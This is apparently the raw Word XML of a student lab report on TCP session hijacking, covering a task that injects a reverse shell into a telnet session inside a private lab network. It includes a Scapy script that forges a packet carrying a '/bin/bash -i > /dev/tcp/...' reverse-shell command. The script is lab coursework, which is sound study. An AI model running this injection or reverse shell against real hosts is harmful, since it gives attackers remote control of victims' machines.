    <w:p w14:paraId="1F626FFD" w14:textId="1E6EF2F0" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110"/>
    <w:p w14:paraId="216A933E" w14:textId="109F71E4" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110"/>
    <w:p w14:paraId="4FE0EC6D" w14:textId="02DAFF12" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110"/>
    <w:p w14:paraId="2678177A" w14:textId="6829772A" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110"/>
    <w:p w14:paraId="19CD80EB" w14:textId="1A5D1512" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E6110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4: Creating Reverse Shell using TCP Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFE2116" w14:textId="6A9F0E30" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r>
        <w:t>This final task aims at creating a reverse shell, i.e., a shell on the victim which is accessible from the attacker. This can give us full control over the victim, and we can execute malicious code easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C260BC9" w14:textId="32663FEF" w:rsidR="007E6110" w:rsidRDefault="00E83F58" w:rsidP="007E6110">
      <w:r>
        <w:t>This attack is very similar to task 3, i.e., hijacking a TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AF7218" w14:textId="59C18845" w:rsidR="00E83F58" w:rsidRDefault="00E83F58" w:rsidP="007E6110">
      <w:r>
        <w:t>Again, using tcpdump and wireshark to gather the necessary information:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="002F6ADD" w:rsidRPr="002F6ADD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="735698DF" wp14:editId="52A68823">
            <wp:extent cx="5943600" cy="1210310"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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ABEF" w14:textId="5F50802D" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="007E6110">
      <w:r w:rsidRPr="002F6ADD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10D5898E" wp14:editId="1D4AF2C7">
            <wp:extent cx="5905500" cy="3458125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"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7658" cy="347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EEDB" w14:textId="50A31E3E" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="007E6110"/>
    <w:p w14:paraId="1CCC1D9F" w14:textId="40A52650" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="007E6110">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F6ADD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Source Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC4245E" w14:textId="77777777" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD">
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B4209B" w14:textId="77777777" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD">
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A53E142" w14:textId="77777777" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD"/>
    <w:p w14:paraId="1EF559B3" w14:textId="77777777" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD">
      <w:r>
        <w:t>ip  = IP(src="10.9.0.6", dst="10.9.0.5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457EEEC2" w14:textId="77777777" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD">
      <w:r>
        <w:t>tcp = TCP(sport=35556, dport=23, flags="A", seq=2544535324, ack=4049365335)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319A744D" w14:textId="77777777" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>data = "\n/bin/bash -i &gt; /dev/tcp/10.9.0.1/9000 0&lt;&amp;1 2&gt;&amp;1\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6C7010" w14:textId="77777777" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD">
      <w:r>
        <w:t>pkt = ip/tcp/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1413D13C" w14:textId="77777777" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD">
      <w:r>
        <w:t>ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABB9984" w14:textId="7E571262" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD">
      <w:r>
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D692F89" w14:textId="2DA0CFF1" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD"/>
    <w:p w14:paraId="0D5629CB" w14:textId="73364A0D" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD">
      <w:r>
        <w:t>Sending the malicious packet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230D0A7E" w14:textId="04C3DAEC" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD">
      <w:r w:rsidRPr="002F6ADD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E4C2E3A" wp14:editId="7A4B163B">
            <wp:extent cx="5943600" cy="3147695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/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C86E" w14:textId="77777777" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD"/>
    <w:p w14:paraId="68B24F7F" w14:textId="71F901FE" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD">
      <w:r>
        <w:t>Since I am using port 9000 in the command to establish the reverse shell, I created a TCP server on the attacker to establish the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CE6BE6" w14:textId="49C3EE0C" w:rsidR="002F6ADD" w:rsidRDefault="002F6ADD" w:rsidP="002F6ADD">
      <w:r>
        <w:t>In the screenshot below, we can see that the reverse shell has been established and I can execute code on the victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C902603" w14:textId="547AA06F" w:rsidR="002F6ADD" w:rsidRPr="002F6ADD" w:rsidRDefault="00F42818" w:rsidP="002F6ADD">
      <w:r w:rsidRPr="00F42818">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F69A0BB" wp14:editId="78946051">
            <wp:extent cx="3842742" cy="2025650"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="32" name="Picture 3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4313" cy="203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6ADD" w:rsidRPr="002F6A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453D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6366B4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FE127F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="540CBBCA"/>
    <w:lvl w:ilvl="0" w:tplc="9C20E4C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596283"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00A63B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CD7931"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D25C9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296C33"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6CE061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4282759">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="974526834">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="528031323">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="246615556">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="17832585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10C"/>
    <w:rsid w:val="000D3536"/>
    <w:rsid w:val="001641A9"/>
    <w:rsid w:val="00214161"/>
    <w:rsid w:val="002F6ADD"/>
    <w:rsid w:val="003F57BE"/>
    <w:rsid w:val="00451779"/>
    <w:rsid w:val="004D210C"/>
    <w:rsid w:val="004F43B7"/>
    <w:rsid w:val="005339E3"/>
    <w:rsid w:val="00575CCC"/>
    <w:rsid w:val="00745A5A"/>
    <w:rsid w:val="007E6110"/>
    <w:rsid w:val="00815B31"/>
    <w:rsid w:val="0085123B"/>
    <w:rsid w:val="008672D3"/>
    <w:rsid w:val="00991EFF"/>
    <w:rsid w:val="00B331C3"/>
    <w:rsid w:val="00BE0DBB"/>
    <w:rsid w:val="00E83F58"/>
    <w:rsid w:val="00F42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05AFE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{71008961-5613-4269-9538-CB381D7BC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41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41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641A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41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641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641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F43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540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12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6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20</Pages>
  <Words>1889</Words>
  <Characters>10773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Sanchit Dass</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sanchit Dass</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-01T23:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-02T03:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>